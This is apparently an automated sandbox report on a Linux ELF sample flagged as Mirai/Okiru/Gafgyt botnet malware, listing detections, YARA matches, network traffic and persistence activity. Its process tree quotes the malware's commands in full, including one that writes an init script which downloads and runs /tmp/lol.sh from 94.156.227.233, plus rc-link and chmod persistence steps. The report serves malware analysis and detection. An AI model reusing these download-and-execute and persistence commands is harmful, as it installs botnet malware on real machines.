Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86_32.nn.elf

Overview

General Information

Sample name:x86_32.nn.elf
Analysis ID:1580233
MD5:7a8c8bd1879880b4910dc8511392a718
SHA1:f10607e0a3e2fac1f00257ffccb9a1dc1c69ebaf
SHA256:cbc99993ee3f76b86331fabc4929c8277a76a2d35c86af1982901e8b5f9b03ae
Tags:elfuser-abuse_ch
Infos:

Detection

Okiru
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Okiru
Drops files in suspicious directories
Machine Learning detection for sample
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1580233
Start date and time:2024-12-24 05:27:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86_32.nn.elf
Detection:MAL
Classification:mal84.spre.troj.evad.linELF@0/9@2/0
  • VT rate limit hit for: /etc/rc.local
Command:/tmp/x86_32.nn.elf
PID:5432
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • x86_32.nn.elf (PID: 5432, Parent: 5344, MD5: 7a8c8bd1879880b4910dc8511392a718) Arguments: /tmp/x86_32.nn.elf
    • sh (PID: 5449, Parent: 5432, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 5455, Parent: 5449)
      • systemctl (PID: 5455, Parent: 5449, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 5471, Parent: 5432, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 5472, Parent: 5471)
      • chmod (PID: 5472, Parent: 5471, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 5473, Parent: 5432, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 5474, Parent: 5473)
      • ln (PID: 5474, Parent: 5473, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 5475, Parent: 5432, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
    • sh (PID: 5476, Parent: 5432, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
      • sh New Fork (PID: 5477, Parent: 5476)
      • chmod (PID: 5477, Parent: 5476, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh
    • sh (PID: 5478, Parent: 5432, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 5479, Parent: 5478)
      • mkdir (PID: 5479, Parent: 5478, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 5480, Parent: 5432, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
      • sh New Fork (PID: 5481, Parent: 5480)
      • ln (PID: 5481, Parent: 5480, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh
  • udisksd New Fork (PID: 5442, Parent: 802)
  • dumpe2fs (PID: 5442, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 5469, Parent: 5468)
  • snapd-env-generator (PID: 5469, Parent: 5468, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 5494, Parent: 802)
  • dumpe2fs (PID: 5494, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5537, Parent: 802)
  • dumpe2fs (PID: 5537, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
SourceRuleDescriptionAuthorStrings
x86_32.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    x86_32.nn.elfLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
    • 0xe7a8:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
    x86_32.nn.elfLinux_Trojan_Mirai_fa3ad9d0unknownunknown
    • 0x4988:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
    • 0x4c5b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
    • 0x5945:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
    x86_32.nn.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
    • 0x5a40:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
    x86_32.nn.elfLinux_Trojan_Mirai_5f7b67b8unknownunknown
    • 0xf3ab:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
    Click to see the 4 entries
    SourceRuleDescriptionAuthorStrings
    5432.1.0000000008048000.000000000805b000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
      5432.1.0000000008048000.000000000805b000.r-x.sdmpLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
      • 0xe7a8:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
      5432.1.0000000008048000.000000000805b000.r-x.sdmpLinux_Trojan_Mirai_fa3ad9d0unknownunknown
      • 0x4988:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      • 0x4c5b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      • 0x5945:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      5432.1.0000000008048000.000000000805b000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x5a40:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      5432.1.0000000008048000.000000000805b000.r-x.sdmpLinux_Trojan_Mirai_5f7b67b8unknownunknown
      • 0xf3ab:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
      Click to see the 5 entries
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: x86_32.nn.elfVirustotal: Detection: 23%Perma Link
      Source: x86_32.nn.elfReversingLabs: Detection: 21%
      Source: x86_32.nn.elfJoe Sandbox ML: detected
      Source: x86_32.nn.elfString: getinfo xxx/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%ssize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginnfstftpmallocwaitpidw/etc/motd%s
      Source: global trafficTCP traffic: 192.168.2.13:44546 -> 94.156.227.234:38242
      Source: global trafficTCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
      Source: x86_32.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.drString found in binary or memory: http://94.156.227.233/
      Source: x86_32.nn.elf, 5432.1.00000000ffe42000.00000000ffe63000.rw-.sdmpString found in binary or memory: http://94.156.227.233/lol.sh
      Source: x86_32.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
      Source: unknownNetwork traffic detected: HTTP traffic on port 48202 -> 443

      System Summary

      barindex
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: getinfo xxx/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%ssize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bi
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: classification engineClassification label: mal84.spre.troj.evad.linELF@0/9@2/0

      Persistence and Installation Behavior

      barindex
      Source: /tmp/x86_32.nn.elf (PID: 5432)File: /etc/profileJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5432)File: /etc/rc.localJump to behavior
      Source: /usr/bin/ln (PID: 5474)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
      Source: /usr/bin/ln (PID: 5481)File: /etc/rc.d/S99sh -> /etc/init.d/shJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5432)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 5472)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 5477)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5263/cmdlineJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5520/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5521/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5519/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5511/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5599/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5610/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5512/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5513/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5514/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/319/cmdlineJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5515/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5537/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5516/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5517/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5518/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5595/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5596/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5597/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5510/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5598/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5508/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5607/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/1/cmdlineJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5509/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5608/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5609/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5522/statusJump to behavior
